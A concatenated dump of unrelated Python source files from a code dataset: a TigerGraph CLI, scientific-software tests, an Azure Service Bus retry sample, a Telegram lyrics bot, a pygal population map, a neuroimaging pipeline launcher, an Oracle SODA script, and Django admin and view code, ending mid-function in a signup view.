    # Generic query params
    attributes: List[str] = typer.Option(
        [], '--attr',
        help="Attributes to return for each vertex, multiple can be specified by using the flag multiple times. "
             "See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#select ."
    ),
    where: List[str] = typer.Option(
        [], '--where',
        help="A condition to match for returned vertices, "
             "multiple can be specified by using the flag multiple times. "
             "Multiple conditions are joined with AND. "
             "See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#filter . "
             "For string conditions, the literal can be escaped like so: '--where=gender=\\\"male\\\"'. "
             "Alternatively, string escapes can be replaced by the URL-encoded string '%22'."
    ),
    sort_by_attrs: List[str] = typer.Option(
        [], '--sort',
        help="Attribute name to sort results by, multiple can be specified by using the flag multiple times. "
             "See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#sort."
    ),
    limit: int = typer.Option(10, '--limit', help="Maximum number of results to retrieve."),
    timeout: int = typer.Option(60, '--timeout', help="Timeout in seconds.")
):
    """Get a set of vertices, either by ID or by query"""
    # require_graph=True: vertex queries are meaningless without a graph context.
    conn = get_initialized_tg_connection(config_name=config_name, graph_name=graph_name, require_graph=True)
    if vertex_ids:
        # Given ID's give precedence: attr/where/sort/limit options are ignored here.
        output = conn.getVerticesById(vertex_type, resolve_multiple_args(vertex_ids))
    else:
        # Generic query path; list options are preprocessed into the REST++ syntax.
        output = conn.getVertices(
            vertex_type,
            select=preprocess_list_query(attributes),
            where=preprocess_list_query(where),
            sort=preprocess_list_query(sort_by_attrs),
            limit=limit,
            timeout=timeout
        )
    cli.print_to_console(output)
@get_app.command("edges")
def get_edges(
    # Basic config
    config_name: str = typer.Argument(None, help=CONFIG_ARG_HELP),
    graph_name: str = typer.Argument(None, help=GRAPH_ARG_HELP),
    # Required items
    source_vertex_type: str = typer.Option(..., "--from-type", help="Type of the source vertex."),
    source_vertex_id: str = typer.Option(..., "--from-id", help="ID of the source vertex."),
    # Filter by target
    target_vertex_id: str = typer.Option(None, "--to-id", help="ID of the target vertex"),
    target_vertex_type: str = typer.Option(
        None, "--to-type", help="Type of the target vertex. Required if '--to-id' is specified."
    ),
    edge_type: str = typer.Option(
        None, "--edge-type", help="Type of the edge. Required if '--to-id' and '--to-type' are specified."
    ),
    # Generic query params
    attributes: List[str] = typer.Option(
        [], '--attr',
        help="Attributes to return for each edge, multiple can be specified by using the flag multiple times. "
             "See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#select."
    ),
    where: List[str] = typer.Option(
        [], '--where',
        help="A condition to match for returned edges, "
             "multiple can be specified by using the flag multiple times. "
             "Multiple conditions are joined with AND. "
             "See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#filter. "
             "For string conditions, the literal can be escaped like so: '--where=gender=\\\"male\\\"'. "
             "Alternatively, string escapes can be replaced by the URL-encoded string '%22'."
    ),
    sort_by_attrs: List[str] = typer.Option(
        [], '--sort',
        help="Attribute name to sort results by, multiple can be specified by using the flag multiple times. "
             "See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#sort."
    ),
    limit: int = typer.Option(10, '--limit', help="Maximum number of results to retrieve."),
    timeout: int = typer.Option(60, '--timeout', help="Timeout in seconds.")
):
    """Get a set of edges"""
    conn = get_initialized_tg_connection(config_name=config_name, graph_name=graph_name, require_graph=True)
    # A target id only makes sense together with a target type and edge type;
    # fail fast with a user-facing message instead of a confusing server error.
    if target_vertex_id and (not target_vertex_type or not edge_type):
        cli.terminate(message="Target vertex ID is specified but target vertex type or edge type isn't.", is_err=True)
    output = conn.getEdges(
        sourceVertexType=source_vertex_type,
        sourceVertexId=source_vertex_id,
        targetVertexType=target_vertex_type,
        targetVertexId=target_vertex_id,
        edgeType=edge_type,
        select=preprocess_list_query(attributes),
        where=preprocess_list_query(where),
        sort=preprocess_list_query(sort_by_attrs),
        limit=limit,
        timeout=timeout
    )
    cli.print_to_console(output)
@get_app.command("types")
def get_type_info(
    # Basic config
    config_name: str = typer.Argument(None, help=CONFIG_ARG_HELP),
    graph_name: str = typer.Argument(None, help=GRAPH_ARG_HELP),
    # Types to query
    vertex_type_names: List[str] = typer.Option(
        [], "--vertex", help="Vertex type name to query. Specify * to query all."
    ),
    edge_type_names: List[str] = typer.Option(
        [], "--edge",
        # BUG FIX: this help text was a copy-paste of the vertex option's text.
        help="Edge type name to query. Specify * to query all."
    )
):
    """Get a set of types, either vertices or edges. If no options are given, all types are returned."""
    conn = get_initialized_tg_connection(config_name=config_name, graph_name=graph_name, require_graph=True)
    results = {}
    # When neither filter is supplied, query everything on both sides.
    query_all = (not vertex_type_names) and (not edge_type_names)
    if vertex_type_names or query_all:
        vertex_types = "*" if query_all else resolve_multiple_args(vertex_type_names)
        results.update(conn.getVertexStats(vertex_types))
    if edge_type_names or query_all:
        edge_types = "*" if query_all else resolve_multiple_args(edge_type_names)
        results.update(conn.getEdgeStats(edge_types))
    cli.print_to_console(results)
@get_app.command("schema")
def get_schema(config_name: str, graph_name: str):
    """Retrieve the schema for the configuration"""
    connection = get_initialized_tg_connection(config_name=config_name, graph_name=graph_name)
    cli.print_to_console(connection.getSchema())
| StarcoderdataPython |
1699342 | <reponame>tadams42/seveno_pyutil<filename>tests/benchmarking_utilities_spec.py
import time
from seveno_pyutil import Stopwatch
class DescribeStopwatch(object):
    def it_provides_context_manager_for_duration_measurement(self):
        """Sleeping ~1s inside the Stopwatch context must record >= 1000 ms."""
        with Stopwatch() as timer:
            time.sleep(1)
        assert timer.duration_ms >= 1000
| StarcoderdataPython |
54045 | #!/usr/bin/env python
"""Test functions in openmoltools.schrodinger."""
import unittest
from openmoltools.schrodinger import *
@unittest.skipIf(not is_schrodinger_suite_installed(), "This test requires Schrodinger's suite")
def test_structconvert():
"""Test run_structconvert() function."""
benzene_path = utils.get_data_filename("chemicals/benzene/benzene.pdb")
def collect_lines(pdb_path):
"""Collect all HETATM and CONNECT lines in the pdb."""
all_lines = []
with open(pdb_path, 'r') as f:
for line in f:
field = line[:6]
n_atom = line[10:11]
if n_atom == '4' or n_atom == '9':
continue # Discard atoms 4 and 9 which have a -0.000
if field == 'HETATM' or field == 'CONECT':
all_lines.append(line.strip())
return all_lines
with mdtraj.utils.enter_temp_directory():
# Convert from pdb to mol2 and back
run_structconvert(benzene_path, 'benzene.mol2')
run_structconvert('benzene.mol2', 'benzene.pdb')
new_lines = collect_lines('benzene.pdb')
# The new pdb should be equal to the old one
original_lines = collect_lines(benzene_path)
assert original_lines == new_lines
@unittest.skipIf(not is_schrodinger_suite_installed(), "This test requires Schrodinger's suite")
def test_proplister():
    """Test run_proplister() function.

    Reads a benzene SDF and checks that the single molecule's property map
    contains the expected number of entries and a known subset of values.
    """
    benzene_path = utils.get_data_filename("chemicals/benzene/benzene.sdf")
    properties = run_proplister(benzene_path)
    # One molecule in the file, with 23 listed properties.
    assert len(properties) == 1
    assert len(properties[0]) == 23
    # Test subset of properties
    expected = {'i_sd_PUBCHEM_COMPOUND_CID': '241',
                'r_sd_PUBCHEM_CONFORMER_RMSD': '0.4',
                'i_sd_PUBCHEM_CONFORMER_DIVERSEORDER': '1',
                's_sd_PUBCHEM_MMFF94_PARTIAL_CHARGES': ('12\n1 -0.15\n10 0.15\n11 0.15\n'
                                                        '12 0.15\n2 -0.15\n3 -0.15\n4 -0.15\n'
                                                        '5 -0.15\n6 -0.15\n7 0.15\n8 0.15\n'
                                                        '9 0.15')
                }
    # Subset check: every expected item must appear among the parsed properties.
    assert set(expected.items()) < set(properties[0].items())
@unittest.skipIf(not is_schrodinger_suite_installed(), "This test requires Schrodinger's suite")
def test_epik_maesubset_autoconvert():
    """Test run_epik and run_maesubset functions and autoconvert_maestro decorator.

    Runs the explicit convert -> epik -> subset -> convert pipeline, then the
    single autoconverting run_epik call, and checks both produce identical SDF
    output with two molecules.
    """
    imatinib_path = utils.get_data_filename("chemicals/imatinib/imatinib.sdf")
    with mdtraj.utils.enter_temp_directory():
        run_structconvert(imatinib_path, 'imatinib.mae')
        run_epik('imatinib.mae', 'imatinib-epik.mae', ph=7.0)
        run_maesubset('imatinib-epik.mae', 'imatinib02.mae', range=[0, 2])
        run_structconvert('imatinib02.mae', 'imatinib02.sdf')
        # The 4 lines above should be equivalent to
        run_epik(imatinib_path, 'imatinib-auto02.sdf', ph=7.0, tautomerize=True,
                 extract_range=[0, 2])
        # Check that results contain indeed 2 molecules
        assert len(run_proplister('imatinib02.sdf')) == 2  # 2 molecules
        assert len(run_proplister('imatinib-auto02.sdf')) == 2
        # Check that results are identical
        with open('imatinib02.sdf', 'r') as f:
            lines = f.readlines()
        with open('imatinib-auto02.sdf', 'r') as f:
            assert f.readlines() == lines
| StarcoderdataPython |
3544857 | <reponame>vincenttran-msft/azure-sdk-for-python
#!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""
An (overly) verbose sample demonstrating possible failure modes and potential recovery patterns.
Many of these catches are present for illustrative or duplicate purposes, and could be condensed or elided
in a production scenario depending on the system design.
"""
import os
from azure.servicebus import ServiceBusClient, ServiceBusMessage
from azure.servicebus.exceptions import (
MessageSizeExceededError,
ServiceBusConnectionError,
ServiceBusAuthorizationError,
ServiceBusAuthenticationError,
OperationTimeoutError,
ServiceBusError,
ServiceBusCommunicationError,
MessageAlreadySettled,
MessageLockLostError,
MessageNotFoundError
)
CONNECTION_STR = os.environ['SERVICE_BUS_CONNECTION_STR']
QUEUE_NAME = os.environ["SERVICE_BUS_QUEUE_NAME"]
def send_batch_messages(sender):
    """Build a batch of 10 messages and send it, retrying transient failures.

    Messages that cannot be constructed (TypeError) or do not fit in the batch
    (MessageSizeExceededError) are skipped. The send itself is attempted up to
    3 times; if every attempt fails with a retryable error, the last error is
    re-raised so the caller knows the batch was not delivered.
    """
    batch_message = sender.create_message_batch()
    for i in range(10):
        try:
            message = ServiceBusMessage("Data {}".format(i))
        except TypeError:
            # Message body is of an inappropriate type, must be string, bytes or None.
            continue
        try:
            batch_message.add_message(message)
        except MessageSizeExceededError:
            # ServiceBusMessageBatch object reaches max_size.
            # New ServiceBusMessageBatch object can be created here to send more data.
            # This must be handled at the application layer, by breaking up or condensing.
            continue

    last_error = None
    for _ in range(3):  # Send retries
        try:
            sender.send_messages(batch_message)
            return
        except OperationTimeoutError as e:
            # BUG FIX: previously a persistent timeout left last_error as None,
            # so the function returned silently as if the send had succeeded.
            last_error = e
            continue
        except MessageSizeExceededError:
            # The body provided in the message to be sent is too large.
            # This must be handled at the application layer, by breaking up or condensing.
            raise
        except ServiceBusError as e:
            # Other types of service bus errors that can be handled at the higher level,
            # such as connection/auth errors. If it happens persistently, should bubble up,
            # and should be logged/alerted if high volume.
            last_error = e
            continue
    if last_error:
        raise last_error
def receive_messages(receiver):
    """Drain the receiver, settling each message with per-message retry.

    Each received message is processed, then completed (on success) or
    abandoned (on processing failure); settlement itself is retried up to 3
    times against transient service errors. Returns when the receiver's
    iterator is exhausted.
    """
    # NOTE(review): should_retry is never set to False; the loop only exits via
    # the `return` after the for-loop or a raised authorization error.
    should_retry = True
    while should_retry:
        try:
            for msg in receiver:
                try:
                    # Do your application-specific data processing here
                    print(str(msg))
                    should_complete = True
                except Exception as e:
                    # Processing failed: remember it so the message is abandoned below.
                    should_complete = False
                for _ in range(3):  # Settlement retry
                    try:
                        if should_complete:
                            receiver.complete_message(msg)
                        else:
                            receiver.abandon_message(msg)
                        # Depending on the desired behavior, one could dead letter on failure instead; failure modes are comparable.
                        # Abandon returns the message to the queue for another consumer to receive, dead letter moves to the dead letter subqueue.
                        #
                        # receiver.dead_letter_message(msg, reason=str(e), error_description="Application level failure")
                        break
                    except MessageAlreadySettled:
                        # Message was already settled, either somewhere earlier in this processing or by another node. Continue.
                        break
                    except MessageLockLostError:
                        # Message lock was lost before settlement. Handle as necessary in the app layer for idempotency then continue on.
                        break
                    except MessageNotFoundError:
                        # Message has an improper sequence number, was dead lettered, or otherwise does not exist. Handle at app layer, continue on.
                        break
                    except ServiceBusError:
                        # Any other undefined service errors during settlement. Can be transient, and can retry, but should be logged, and alerted on high volume.
                        continue
            return
        except ServiceBusAuthorizationError:
            # Permission based errors should be bubbled up.
            raise
        except:
            # NOTE(review): a bare except also traps KeyboardInterrupt/SystemExit,
            # preventing clean shutdown — consider `except Exception:` instead.
            # Although miscellaneous service errors and interruptions can occasionally occur during receiving,
            # In most pragmatic cases one can try to continue receiving unless the failure mode seens persistent.
            # Logging the associated failure and alerting on high volume is often prudent.
            continue
def send_and_receive_defensively():
    """Open a Service Bus client and run one defensive send/receive cycle.

    Retries the whole cycle up to 3 times on connection errors; auth and
    communication errors are considered non-transient and re-raised.
    """
    servicebus_client = ServiceBusClient.from_connection_string(conn_str=CONNECTION_STR, logging_enable=True)
    for _ in range(3):  # Connection retries.
        try:
            print("Opening")
            with servicebus_client:
                sender = servicebus_client.get_queue_sender(queue_name=QUEUE_NAME)
                try:
                    with sender:
                        print("Sending")
                        send_batch_messages(sender)
                except ValueError:
                    # Handler was shut down previously. (Cannot happen in this example, shown for completeness.)
                    pass
                receiver = servicebus_client.get_queue_receiver(queue_name=QUEUE_NAME)
                try:
                    with receiver:
                        print("Receiving")
                        receive_messages(receiver)
                except ValueError:
                    # Handler was shut down previously. (Cannot happen in this example, shown for completeness.)
                    pass
            return
        except ServiceBusConnectionError:
            # An error occurred in the connection to the service.
            # This may have been caused by a transient network issue or service problem. It is recommended to retry.
            continue
        except ServiceBusAuthorizationError:
            # An error occurred when authorizing the connection to the service.
            # This may have been caused by the credentials not having the right permission to perform the operation.
            # It is recommended to check the permission of the credentials.
            raise
        except ServiceBusAuthenticationError:
            # An error occurred when authenticate the connection to the service.
            # This may have been caused by the credentials being incorrect. It is recommended to check the credentials.
            raise
        except ServiceBusCommunicationError:
            # Unable to communicate with the specified servicebus. Ensure that the FQDN is correct,
            # and that there is no firewall or network issue preventing connectivity.
            raise
# Script entry point: run the defensive send/receive demo once.
send_and_receive_defensively()
print("Send and Receive is done.")
| StarcoderdataPython |
8000050 | from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InputMediaDocument,
InputMediaVideo,
InputMediaAudio,
Message,
)
from Yukki import app
from pyrogram import Client, filters
from youtubesearchpython import VideosSearch
import lyricsgenius
import re
@Client.on_callback_query(filters.regex(pattern=r"lyrics"))
async def lyricssex(_, CallbackQuery):
    """Callback handler: look up the lyrics of a YouTube video's title on Genius.

    The callback data is expected to be "lyrics <video_id>|<user_id>".
    """
    callback_data = CallbackQuery.data.strip()
    callback_request = callback_data.split(None, 1)[1]
    try:
        # NOTE: `id` shadows the builtin; kept for byte-compatibility.
        id, user_id = callback_request.split("|")
    except Exception as e:
        return await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**:{e}")
    url = (f"https://www.youtube.com/watch?v={id}")
    print(url)
    try:
        results = VideosSearch(url, limit=1)
        # limit=1, so this loop effectively extracts the single result's title.
        for result in results.result()["result"]:
            title = (result["title"])
    except Exception as e:
        return await CallbackQuery.answer("Sound not found. Youtube issues.", show_alert=True)
    # NOTE(review): the Genius API token was redacted in this source ("<KEY>");
    # a real token must be supplied before this handler can work.
    x = "<KEY>"
    y = lyricsgenius.Genius(x)
    print(title)
    # Strip non-word characters so the Genius search is not confused by punctuation.
    t = re.sub(r'[^\w]', ' ', title)
    print(t)
    y.verbose = False
    S = y.search_song(t, get_full_info=False)
    if S is None:
        return await CallbackQuery.answer("Lyrics not found :p", show_alert=True)
    await CallbackQuery.message.delete()
    userid = CallbackQuery.from_user.id
    usr = f"[{CallbackQuery.from_user.first_name}](tg://user?id={userid})"
    xxx = f"""
**Lyrics Search Powered By R<NAME>**
**Searched By:-** {usr}
**Searched Song:-** __{title}__
**Found Lyrics For:-** __{S.title}__
**Artist:-** {S.artist}
**__Lyrics:__**
{S.lyrics}"""
    await CallbackQuery.message.reply_text(xxx)
@Client.on_message(filters.command("lyrics"))
async def lrsearch(_, message: Message):
    """Handle ``/lyrics <song>``: search Genius and reply with the song's lyrics."""
    # Robustness fix: a bare "/lyrics" used to raise IndexError on the split below.
    parts = message.text.split(None, 1)
    if len(parts) < 2:
        return await message.reply_text("Usage: /lyrics <song name>")
    m = await message.reply_text("Searching Lyrics")
    query = parts[1]
    # NOTE(review): the Genius API token was redacted in this source ("<KEY>");
    # a real token (ideally from configuration) must be supplied.
    x = "<KEY>"
    y = lyricsgenius.Genius(x)
    y.verbose = False
    S = y.search_song(query, get_full_info=False)
    if S is None:
        return await m.edit("Lyrics not found :p")
    xxx = f"""
**Lyrics Search Powered By MUNNA X MUSIC Bot**
**Searched Song:-** __{query}__
**Found Lyrics For:-** __{S.title}__
**Artist:-** {S.artist}
**__Lyrics:__**
{S.lyrics}"""
    await m.edit(xxx)
| StarcoderdataPython |
5100199 | <filename>4.29/world_population.py<gh_stars>0
import json
import pygal.maps.world
from country_codes import get_country_code
# Load the raw World Bank population data into a list of dicts.
filename = 'population_data.json'
with open(filename) as f:
    pop_data = json.load(f)
# Build a {two-letter country code: population} mapping for the year 2010.
cc_populations = {}
for pop_dict in pop_data:
    if pop_dict['Year'] == '2010':
        country = pop_dict['Country Name']
        # Values can arrive as float strings, so convert via float before int.
        population = int(float(pop_dict['Value']))
        code = get_country_code(country)
        if code:  # Skip countries for which no pygal country code exists.
            cc_populations[code] = population
# Render the population data onto a world map and save it as SVG.
wm = pygal.maps.world.World()
wm.title = 'World Population in 2010,by Country'
wm.add('2010', cc_populations)
wm.render_to_file('world_population.svg')
| StarcoderdataPython |
12852350 | #!/usr/bin/env python
"""
"""
from xml.etree.ElementTree import Element
import xml.etree.ElementTree as etree
import xml.dom.minidom
import re
import sys
import getopt
import os
from time import gmtime, strftime
from nipype import config, logging
from nighres.lesion_tool.lesion_pipeline import Lesion_extractor
def main():
    """Parse CLI options and run the lesion-extraction Nipype workflow.

    Options: -n workflow name, -d base directory, -s subject id,
    -f FreeSurfer subjects dir, -a atlas file, -l label file.
    """
    try:
        o, a = getopt.getopt(sys.argv[1:], "n:d:s:f:a:l:")
    except getopt.GetoptError as err:
        print(err)
        print('waimea.py -n <directory> -d <base_directory> -s <subject> -f <freesurfer dir> -a <atlas> -l <labels>')
        sys.exit(2)
    # NOTE(review): only checks that at least 4 options were passed; if any of
    # the six specific options is missing, the corresponding local below is
    # never bound and Lesion_extractor(...) raises NameError — confirm intent.
    if len(o) < 4:
        print('waimea.py -n <directory> -d <base_directory> -s <subject> -f <freesurfer dir> -a <atlas> -l <labels>')
        sys.exit(2)
    for opt, arg in o:
        if opt == '-n':
            wf_name = arg
        elif opt == '-d':
            base_dir = arg
        elif opt == '-s':
            sub = arg
        elif opt == '-f':
            fsdir = arg
        elif opt == '-a':
            atlas = arg
        elif opt == '-l':
            labels = arg
    wf = Lesion_extractor(wf_name=wf_name,
                          base_dir=base_dir,
                          subjects=[sub],
                          #main=main,
                          #acc=acc,
                          atlas=atlas,
                          fs_subjects_dir=fsdir,
                          labels=labels)
    # Route Nipype logs into the workflow's base directory.
    config.update_config({'logging': {'log_directory': wf.base_dir, 'log_to_file': True}})
    logging.update_logging(config)
    config.set('execution', 'job_finished_timeout', '20.0')
    wf.config['execution'] = {'job_finished_timeout': '10.0'}
    try:
        wf.run()
    except:
        # Bare except, but it re-raises, so interrupts still propagate.
        print('Error! Pipeline exited ')
        raise
if __name__ == "__main__":
main()
| StarcoderdataPython |
8017886 | <reponame>oracle-devrel/leagueoflegends-optimizer
# Copyright (c) 2021 Oracle and/or its affiliates.
import yaml
import cx_Oracle
import os
from pathlib import Path
home = str(Path.home())
def load_config_file():
    """Read ../config.yaml and return its parsed contents as a dict."""
    with open('../config.yaml') as config_file:
        return yaml.safe_load(config_file)
# wallet location (default is HOME/wallets/wallet_X)
# Point cx_Oracle at the wallet directory (default HOME/wallets/wallet_X) at import time.
os.environ['TNS_ADMIN'] = '{}/{}'.format(home, load_config_file()['WALLET_DIR'])
print(os.environ['TNS_ADMIN'])
def init_db_connection(data):
    """Open an autocommitting cx_Oracle connection from the ``db`` config section."""
    creds = data['db']
    conn = cx_Oracle.connect(creds['username'], creds['password'], creds['dsn'])
    print('Connection successful.')
    conn.autocommit = True
    return conn
def process_1v1_model(connection):
    """Flatten two-champion matchup documents into the ``1v1_model`` SODA collection.

    For each document in ``matchups``, writes one row
    ``{match_id, champ1, champ2, win}`` where ``win`` is 1 when the first
    listed participant won, else 0. Rows violating a unique index
    (duplicate match ids) are skipped.
    """
    soda = connection.getSodaDatabase()
    collection_matchups = soda.createCollection('matchups')
    collection_1v1_model = soda.createCollection('1v1_model')

    for doc in collection_matchups.find().getDocuments():
        content = doc.getContent()
        match_id = content.get('p_match_id')
        data = content.get('data') or []

        champion_matchup = [entry.get('champion') for entry in data]
        win_matchup = [entry.get('win') for entry in data]

        # Robustness fix: documents without both participants previously
        # raised IndexError on champion_matchup[1] / win_matchup[0].
        if len(champion_matchup) < 2 or not win_matchup:
            continue

        obj = {
            'match_id': match_id,
            'champ1': champion_matchup[0],
            'champ2': champion_matchup[1],
            # Same semantics as the original `is True` check: any non-True
            # value (including truthy strings) maps to 0.
            'win': 1 if win_matchup[0] is True else 0
        }
        print(obj)
        try:
            collection_1v1_model.insertOne(obj)
        except cx_Oracle.IntegrityError:
            # Duplicate row — already processed; move on.
            continue
        print('Inserted {}'.format(obj))
def main():
    """Entry point: load config, connect to the DB, build the 1v1 model, close."""
    settings = load_config_file()
    db_conn = init_db_connection(settings)
    process_1v1_model(db_conn)
    db_conn.close()
if __name__ == '__main__':
main() | StarcoderdataPython |
1734393 | <filename>elections/admin.py<gh_stars>1-10
from django.contrib import admin
from django.utils.html import format_html
from reversion.admin import VersionAdmin
from elections.models import Election, ElectionResult, PresidentCandidate, PresidentCandidateBiography, \
PresidentCandidatePoliticalExperience, PresidentCandidateWorkExperience, PresidentCandidateArticle, \
PresidentCandidateArticleInformation, MayorCandidate, Moderators, Debates, EuroParliamentCandidate, \
EuroParliamentCandidatePoliticalExperience, EuroParliamentCandidateWorkExperience, EuroParliamentCandidateEducation, \
EuroParliamentCandidateConviction, SeimasCandidate
from django.utils.translation import gettext_lazy as _
@admin.register(Election)
class ElectionAdmin(VersionAdmin):
    """Admin for Election records, searchable by name or external election id."""
    search_fields = ['name', 'election_id']
    # FIX: 'vr_id' was listed twice, rendering a duplicate column in the changelist.
    list_display = ['name', 'is_active', 'slug', 'election_id', 'election_date', 'last_results_update', 'vr_id',
                    'rt_no']
@admin.register(ElectionResult)
class ElectionResultAdmin(VersionAdmin):
    """Admin for per-candidate election results.

    FIX: this class was previously also named ``ElectionAdmin``, silently
    shadowing the Election admin class defined above; renamed to match its model.
    """
    search_fields = ['name']
    list_select_related = ['election']
    list_filter = ['election']
    list_display = ['name', 'party', 'photo', 'election', 'candidate_id', 'postal_votes', 'ballot_votes',
                    'percent_ballot_paper', 'percent_voters', 'created_at', 'updated_at']
class PresidentCandidateArticleInline(admin.StackedInline):
    # Stacked inline editor for a candidate's related articles.
    model = PresidentCandidateArticle
class PresidentCandidateArticleInformationInline(admin.StackedInline):
    # Stacked inline for the extra information attached to an article.
    model = PresidentCandidateArticleInformation
class PresidentCandidateBiographyInline(admin.StackedInline):
    # Stacked inline for a candidate's biography entries.
    # NOTE(review): defined but not referenced by any admin below — confirm if still needed.
    model = PresidentCandidateBiography
class PresidentCandidatePoliticalExperienceInline(admin.StackedInline):
    # Stacked inline for a candidate's political experience entries.
    model = PresidentCandidatePoliticalExperience
class PresidentCandidateWorkExperienceInline(admin.StackedInline):
    # Stacked inline for a candidate's work experience entries.
    model = PresidentCandidateWorkExperience
@admin.register(PresidentCandidate)
class PresidentCandidateAdmin(VersionAdmin):
    """Admin for presidential candidates with experience inlines."""
    inlines = [PresidentCandidatePoliticalExperienceInline, PresidentCandidateWorkExperienceInline]
    search_fields = ['name']
    list_display = ['name', 'photo', 'is_active', 'candidate_program_title', 'candidate_program_summary',
                    'candidate_program_link', 'created_at', 'updated_at']
    # Slug is generated elsewhere, so it is hidden from the edit form.
    exclude = ['slug']
    view_on_site = True
@admin.register(SeimasCandidate)
class SeimasCandidateAdmin(VersionAdmin):
    """Admin for Seimas (parliament) candidates."""
    search_fields = ['name']
    list_display = ['name', 'photo', 'is_active', 'email', 'party', 'district', 'created_at', 'updated_at']
    view_on_site = True
@admin.register(MayorCandidate)
class MayorCandidateAdmin(admin.ModelAdmin):
    """Admin for mayor candidates, filterable by municipality and party."""
    search_fields = ['first_name', 'last_name', ]
    list_display = ['first_name', 'last_name', 'email', 'is_active', 'party', 'municipality', 'created_at',
                    'updated_at']
    list_filter = ['is_active', 'municipality', 'party']
    # Slug is generated elsewhere, so it is hidden from the edit form.
    exclude = ['slug']
    view_on_site = True
class EuroParliamentCandidatePoliticalExperienceInline(admin.StackedInline):
    # Stacked inline for an MEP candidate's political experience entries.
    model = EuroParliamentCandidatePoliticalExperience
class EuroParliamentCandidateWorkExperienceInline(admin.StackedInline):
    # Stacked inline for an MEP candidate's work experience entries.
    model = EuroParliamentCandidateWorkExperience
class EuroParliamentCandidateEducationInline(admin.StackedInline):
    # Stacked inline for an MEP candidate's education entries.
    model = EuroParliamentCandidateEducation
class EuroParliamentCandidateConvictionInline(admin.StackedInline):
    # Stacked inline for an MEP candidate's conviction records.
    model = EuroParliamentCandidateConviction
@admin.register(EuroParliamentCandidate)
class MepCandidateAdmin(admin.ModelAdmin):
    """Admin for European Parliament candidates with related experience inlines."""
    inlines = [EuroParliamentCandidatePoliticalExperienceInline, EuroParliamentCandidateWorkExperienceInline,
               EuroParliamentCandidateEducationInline, EuroParliamentCandidateConvictionInline]
    search_fields = ['first_name', 'last_name']
    list_display = ['first_name', 'last_name', 'is_active', 'party', 'created_at', 'updated_at']
    # BUG FIX: was ``list_filters`` (with an 's'), which Django silently ignores,
    # so the sidebar filters never appeared.
    list_filter = ['is_active', 'party']
    # Slug is generated elsewhere, so it is hidden from the edit form.
    exclude = ['slug']
    view_on_site = True
@admin.register(PresidentCandidateArticle)
class PresidentCandidateArticleAdmin(VersionAdmin):
    """Admin for candidate articles, with a clickable link column."""
    search_fields = ['candidate__name', 'url']
    list_display = ['candidate', 'article_url', 'created_at']
    list_select_related = ['candidate']
    list_filter = ['candidate__name', ]
    inlines = [PresidentCandidateArticleInformationInline]

    def article_url(self, obj):
        # format_html escapes the URL, keeping the changelist XSS-safe.
        return format_html('<a href="{url}" target="_blank">{url}</a>', url=obj.url)

    article_url.short_description = _("Naujienos nuoroda")
@admin.register(Moderators)
class ModeratorsAdmin(VersionAdmin):
    """Admin for debate moderators."""
    search_fields = ['first_name', 'last_name']
    list_display = ['name', 'photo']
    # Slug is generated elsewhere, so it is hidden from the edit form.
    exclude = ['slug']
def deactivate_debates(ModelAdmin, request, queryset):
    """Admin action: deactivate every selected debate that is still active.

    Saves each row individually (rather than queryset.update) so model save
    logic and signals still run.
    """
    for debate in queryset:
        # Idiom fix: compare truthiness directly instead of `== True`.
        if debate.is_active:
            debate.is_active = False
            debate.save()


deactivate_debates.short_description = "Išjungti pasirinktus debatus"
class DebatesAdmin(VersionAdmin):
search_fields = ['name']
list_display = ['election_type', 'name', 'tour_id', 'location', 'municipality', 'date', 'time', 'moderator',
'is_active',
'created_at', 'updated_at']
list_filter = ['municipality', 'moderator', 'is_active', 'tour_id', 'election_type']
exclude = ['slug']
list_select_related = ['municipality', 'moderator']
autocomplete_fields = ['municipality', 'moderator']
actions = [deactivate_debates]
| StarcoderdataPython |
1763392 | <filename>core/views.py
from django.contrib.auth import login, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.forms.models import inlineformset_factory
from django.shortcuts import render, redirect
from .forms import ProfileForm, SignUpForm
from .models import UserProfile
@login_required
def dashboard(request):
    """Render the dashboard template with the current user's profile (or None)."""
    try:
        perfil = UserProfile.objects.get(user=request.user)
    except UserProfile.DoesNotExist:
        perfil = None
    return render(request, 'dashboard.html', {'usuario': perfil})
@login_required
def profile(request):
    """Render the profile page with the current user's profile (or None)."""
    try:
        perfil = UserProfile.objects.get(user=request.user)
    except UserProfile.DoesNotExist:
        perfil = None
    return render(request, 'profile.html', {'usuario': perfil})
@login_required
def profile_update(request):
    """Let the logged-in user edit their account and profile (avatar) together.

    Uses an inline formset so the User form and its related UserProfile rows are
    validated and saved as a unit. On success, redirects to the dashboard; on
    validation errors, re-renders the bound form and formset.
    """
    try:
        usuario = UserProfile.objects.get(user=request.user)
    except UserProfile.DoesNotExist:
        usuario = None

    ProfileInlineFormset = inlineformset_factory(User, UserProfile, fields=('avatar',))
    # FIX: removed a dead pre-branch formset construction — every code path below
    # reassigned it before use.

    if request.method == 'POST':
        form = ProfileForm(data=request.POST, instance=request.user)
        formset = ProfileInlineFormset(request.POST, request.FILES, instance=request.user)
        if form.is_valid():
            perfil = form.save(commit=False)
            # Rebind the formset to the (unsaved) updated user so related rows
            # validate against the new instance.
            formset = ProfileInlineFormset(request.POST, request.FILES, instance=perfil)
            if formset.is_valid():
                perfil.save()
                formset.save()
                return redirect('dashboard')
    else:
        form = ProfileForm(instance=request.user)
        formset = ProfileInlineFormset(instance=request.user)
    return render(request, 'profile_update.html', {'form': form,
                                                   'formset': formset,
                                                   'usuario': usuario, })
def signup(request):
    """Register a new user, log them in immediately, and redirect to the dashboard."""
    if request.method == 'POST':
        form = SignUpForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get('username')
            # BUG FIX: the credential lookup had been mangled by redaction
            # ("<PASSWORD>" placeholders, which is not even valid Python);
            # restore the standard UserCreationForm field name.
            raw_password = form.cleaned_data.get('password1')
            user = authenticate(username=username, password=raw_password)
            login(request, user)
